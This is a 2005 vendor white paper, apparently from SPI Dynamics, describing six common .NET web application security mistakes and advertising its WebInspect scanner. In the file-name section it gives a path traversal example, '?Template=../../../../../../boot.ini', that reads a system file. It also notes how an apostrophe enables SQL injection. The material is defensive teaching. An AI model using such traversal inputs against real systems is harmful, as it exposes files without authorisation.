Start Secure. Stay Secure.TM The Top Six Security Mistakes .NET Developers Make Are your web applications vulnerable? Start Secure. Stay Secure.TM The Top Six Security Mistakes .NET Developers Make Table of Contents The Top Six Security Mistakes .NET Developers Make 1. Not Integrating Security into Development Process 2. SQL Injection 3. Cross-Site Scripting 4. Using User Input for File Names 5. Improper Use of Cookies and Hidden Parameters 6. Enabling Debug Options in the Web.Config File The Business Case for Application Security About SPI Labs About SPI Dynamics About the WebInspect Product Line Contact Information 1 1 1 2 2 3 3 4 5 5 6 7 © 2005 SPI Dynamics, Inc. All Rights Reserved. No reproduction or redistribution without written permission. ii Start Secure. Stay Secure.TM The Top Six Security Mistakes .NET Developers Make The Top Six Security Mistakes .NET Developers Make Industry analysts estimate that more than 70 percent of today's security breaches occur at the application level. Many are due to the exploitation of security defects within the code. Microsoft has added a tremendous number of features to the .NET environment to help developers create secure applications. For example, authentication has become an integrated part of the development environment, and debug messages are now disabled by default. This renewed focus on security has prodded developers into re-evaluating the importance of integrating protective safeguards into their software development process. Not everyone does it well, however. Here are some of the mistakes .NET developers make most often, according to Customer Service records from SPI Dynamics, Inc. 1. Not Integrating Security into Development Process Coding applications securely, if done as part of the entire development process, will have a minimal impact on development timelines and cost. Additionally, secure development practices will lead to applications that are more robust and less error-prone than insecure applications. However, if security is not considered until the QA or User Acceptance phase of the product life cycle, it can cause a great deal of rework, delays and cost overruns. 2. SQL Injection SQL injection is the act of passing SQL code not intended by the developer into an application. These attack strings are composed of fragments of SQL syntax that will be executed on the database server if the web application © 2005 SPI Dynamics, Inc. All Rights Reserved. No reproduction or redistribution without written permission. 1 Start Secure. Stay Secure.TM The Top Six Security Mistakes .NET Developers Make uses the string when forming a SQL statement without first parsing out certain characters. For example, problems can arise when a developer does not protect against potentially malicious input such as an apostrophe ( ` ), which could close the SQL string and give the user unintended system and application access. 3. Cross-Site Scripting Cross-site scripting is caused by taking user input and returning it to the user without proper encoding. Cross-site scripting (also known as XSS or CSS) occurs when dynamically generated web pages display input that is not properly validated. This allows an attacker to embed malicious JavaScript code into the generated page and execute the script on the machine of any user that views that site. An attacker who uses cross-site scripting successfully might compromise confidential information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end user systems. 4. Using User Input for File Names Developers will frequently use a parameter to determine which file should be shown to the end user. Example: myPageGenerator.aspx?Template=Welcome.html If this type of feature is used, it is critical to ensure that the file requested is in the proper folder. A hacker can change the query string to the following and potentially gain access to inappropriate files: Hacker Example: myPageGenerator.aspx?Template=../../../../../../boot.ini © 2005 SPI Dynamics, Inc. All Rights Reserved. No reproduction or redistribution without written permission. 2 Start Secure. Stay Secure.TM The Top Six Security Mistakes .NET Developers Make 5. Improper Use of Cookies and Hidden Parameters Developers frequently store information in cookies and hidden parameters. Cookies are small pieces of information that are sent from the server to the client browser in an HTTP header. Hidden parameters are name and value attributes for hidden controls in an HTML form. Many web servers use cookies to store session tokens and other session-based tokens. Common mistakes include putting product pricing, credit card numbers, account numbers and other critical information in cookies and hidden parameters. Developers must keep in mind that a hacker can easily change the cookie. 6. Enabling Debug Options in the Web.Config File The section of the Web.Config file tells a .NET application how to deal with errors. An application should never show an end user a detailed error message. Instead, it should show a "friendly" message that says the site is having technical difficulties and NOT give any technical details. Hackers gain a tremendous amount of information from error messages; enabling detailed error messages in an ASP.NET application is a major security concern. © 2005 SPI Dynamics, Inc. All Rights Reserved. No reproduction or redistribution without written permission. 3 Start Secure. Stay Secure.TM The Top Six Security Mistakes .NET Developers Make The following table shows the possible settings: Setting Description* Always display detailed ASP.NET error information. This option should NEVER be used in a production environment. Always display custom (friendly) messages. Display custom (friendly) messages only to users not running on the local Web server. This setting is recommended for security purposes so that you do not display application detail information to remote clients. * Descriptions taken from default Web.Config file generated by Microsoft Visual Studio .NET. The Business Case for Application Security Whether a security breach is made public or confined internally, the fact that a hacker has accessed your sensitive data should be a huge concern to your company, your shareholders and, most importantly, your customers. SPI Dynamics has found that the majority of companies that are vigilant and proactive in their approach to application security are better protected. In the long run, these companies enjoy a higher return on investment for their ebusiness ventures. © 2005 SPI Dynamics, Inc. All Rights Reserved. No reproduction or redistribution without written permission. 4 Start Secure. Stay Secure.TM The Top Six Security Mistakes .NET Developers Make About SPI Labs SPI Labs is the dedicated application security research and testing team of SPI Dynamics. Composed of some of the industry's top security experts, SPI Labs is focused specifically on researching security vulnerabilities at the web application layer. The SPI Labs mission is to provide objective research to the security community and all organizations concerned with security practices. SPI Dynamics uses direct research from SPI Labs to provide daily updates to WebInspect, the leading Web application security assessment software. SPI Labs engineers comply with the standards proposed by the Internet Engineering Task Force (IETF) for responsible security vulnerability disclosure. SPI Labs policies and procedures for disclosure are outlined on the SPI Dynamics web site at: http://www.spidynamics.com/spilabs.html. About SPI Dynamics SPI Dynamics, the expert in web application security assessment, provides software and services to help enterprises protect against the loss of confidential data through the web application layer. The company's flagship product line, WebInspect, assesses the security of an organization's applications and web services, the most vulnerable yet least secure IT infrastructure component. Since its inception, SPI Dynamics has focused exclusively on web application security. SPI Labs, the internal research group of SPI Dynamics, is recognized as the industry's foremost authority in this area. Software developers, quality assurance professionals, corporate security auditors and security practitioners use WebInspect products throughout the application lifecycle to identify security vulnerabilities that would otherwise go undetected by traditional measures. The security assurance provided by WebInspect helps Fortune 500 companies and organizations in regulated © 2005 SPI Dynamics, Inc. All Rights Reserved. No reproduction or redistribution without written permission. 5 Start Secure. Stay Secure.TM The Top Six Security Mistakes .NET Developers Make industries -- including financial services, health care and government -- protect their sensitive data and comply with legal mandates and regulations regarding privacy and information security. SPI Dynamics is privately held with headquarters in Atlanta, Georgia. About the WebInspect Product Line The WebInspect product line ensures the security of your entire network with intuitive, intelligent, and accurate processes that dynamically scan standard and proprietary web applications to identify known and unidentified application vulnerabilities. WebInspect products provide a new level of protection for your critical business information. With WebInspect products, you find and correct vulnerabilities at their source, before attackers can exploit them. Whether you are an application developer, security auditor, QA professional or security consultant, WebInspect provides the tools you need to ensure the security of your web applications through a powerful combination of unique Adaptive-AgentTM technology and SPI Dynamics' industry-leading and continuously updated vulnerability database, SecureBaseTM. Through Adaptive-Agent technology, you can quickly and accurately assess the security of your web content, regardless of your environment. WebInspect enables users to perform security assessments for any web application, including these industry-leading application platforms: Macromedia ColdFusion Lotus Domino Oracle Application Server Macromedia JRun BEA Weblogic Jakarta Tomcat © 2005 SPI Dynamics, Inc. All Rights Reserved. No reproduction or redistribution without written permission. 6 Start Secure. Stay Secure.TM The Top Six Security Mistakes .NET Developers Make Contact Information SPI Dynamics 115 Perimeter Center Place Suite 1100 Atlanta, GA 30346 Telephone: (678) 781-4800 Fax: (678) 781-4850 Email: info@spidynamics.com Web: www.spidynamics.com © 2005 SPI Dynamics, Inc. All Rights Reserved. No reproduction or redistribution without written permission. 7